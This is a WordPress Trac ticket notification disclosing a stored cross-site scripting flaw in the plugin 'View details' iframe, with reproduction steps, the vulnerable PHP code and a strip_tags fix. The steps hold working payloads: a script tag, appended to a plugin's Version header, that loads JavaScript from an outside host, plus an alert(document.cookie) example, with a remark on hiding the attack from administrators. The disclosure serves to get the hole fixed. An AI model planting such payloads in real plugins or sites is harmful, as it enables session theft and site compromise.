[wp-trac] [WordPress Trac] #53020: Stored XSS via «View details» plugin iFrame
WordPress Trac
noreply at wordpress.org
Fri May 7 13:35:34 UTC 2021
#53020: Stored XSS via «View details» plugin iFrame
--------------------------+-----------------------------
Reporter: m0ze | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: 5.8
Component: Security | Version: trunk
Severity: normal | Resolution:
Keywords: has-patch | Focuses: administration
--------------------------+-----------------------------
Description changed by SergeyBiryukov:
Old description:
> I found a way to use the XSS attack vector - through an iFrame with a
> detailed description of the plugin (plugin «View details» iFrame).
>
> === Possible operation options:
>
> * substitution or modification of the original plug-in to hide malicious
> code;
>
> * distribution of the modified plugin through third-party resources.
>
> === Steps To Reproduce:
>
> 0. open any existed plugin from the official WordPress repo, f.e. Hello
> Dolly.
> 1. change the version number to +1 (as a minimum) - from `Version: 1.7.2`
> to `Version: 1.7.3`.
> 2. add your payload right after the last digit - `Version: 1.7.3<script
> src="https://m0ze.ru/payload.a.js"></script>`
> 3. check the plugin info via dashboard, «View details» link.
>
> If you use the payload specifically as a `<script src=...></script>`,
> then visually, except for one digit in the plugin version, nothing will
> change. Other payloads also work
> (`<script>alert(document.cookie)</script>` etc.), but they add extra
> special characters on the right of the plugin version, which may alert
> the website administrator.
>
> === Screenshots:
>
> [[Image(https://i.imgur.com/7pz6UMh.png)]]
>
> [[Image(https://i.imgur.com/E7ejGkJ.png)]]
>
> [[Image(https://i.imgur.com/r2WQmFQ.png)]]
>
> === Code:
>
> **/wp-admin/includes/plugin-install.php, 881-884:**
>
> {{{#!php
> case 'newer_installed':
> /* translators: %s: Plugin version. */
> echo '<a class="button button-primary right disabled">' .
> sprintf( __( 'Newer Version (%s) Installed' ), $status['version'] ) .
> '</a>';
> break;
> }}}
>
> === Quick fix:
>
> `strip_tags($status['version'])`
>
> === Video:
>
> **YouTube short demo:** https://youtu.be/_IRcQ82wovY
>
> === Impact
>
> Malicious JavaScript code injections, the ability to combine attack
> vectors against the targeted system, which can lead to a complete
> compromise of the resource.
>
> There is also an unknown number of plugins that display diagnostic
> information about the site, including the names and versions of plugins,
> where this vulnerability will also be triggered, f.e.: Asset CleanUp:
> Page Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many
> other plugins.
New description:
I found a way to use the XSS attack vector - through an iFrame with a
detailed description of the plugin (plugin «View details» iFrame).
=== Possible operation options:
* substitution or modification of the original plug-in to hide malicious
code;
* distribution of the modified plugin through third-party resources.
=== Steps To Reproduce:
0. open any existed plugin from the official WordPress repo, f.e. Hello
Dolly.
1. change the version number to +1 (as a minimum) - from `Version: 1.7.2`
to `Version: 1.7.3`.
2. add your payload right after the last digit - `Version: 1.7.3<script
src="https://m0ze.ru/payload.a.js"></script>`
3. check the plugin info via dashboard, «View details» link.
If you use the payload specifically as a `<script src=...></script>`, then
visually, except for one digit in the plugin version, nothing will change.
Other payloads also work (`<script>alert(document.cookie)</script>` etc.),
but they add extra special characters on the right of the plugin version,
which may alert the website administrator.
=== Screenshots:
https://i.imgur.com/7pz6UMh.png
https://i.imgur.com/E7ejGkJ.png
https://i.imgur.com/r2WQmFQ.png
=== Code:
**/wp-admin/includes/plugin-install.php, 881-884:**
{{{#!php
case 'newer_installed':
/* translators: %s: Plugin version. */
echo '<a class="button button-primary right disabled">' . sprintf(
__( 'Newer Version (%s) Installed' ), $status['version'] ) . '</a>';
break;
}}}
=== Quick fix:
`strip_tags($status['version'])`
=== Video:
**YouTube short demo:** https://youtu.be/_IRcQ82wovY
=== Impact
Malicious JavaScript code injections, the ability to combine attack
vectors against the targeted system, which can lead to a complete
compromise of the resource.
There is also an unknown number of plugins that display diagnostic
information about the site, including the names and versions of plugins,
where this vulnerability will also be triggered, f.e.: Asset CleanUp: Page
Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many other
plugins.
--
--
Ticket URL: <https://core.trac.wordpress.org/ticket/53020#comment:6>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list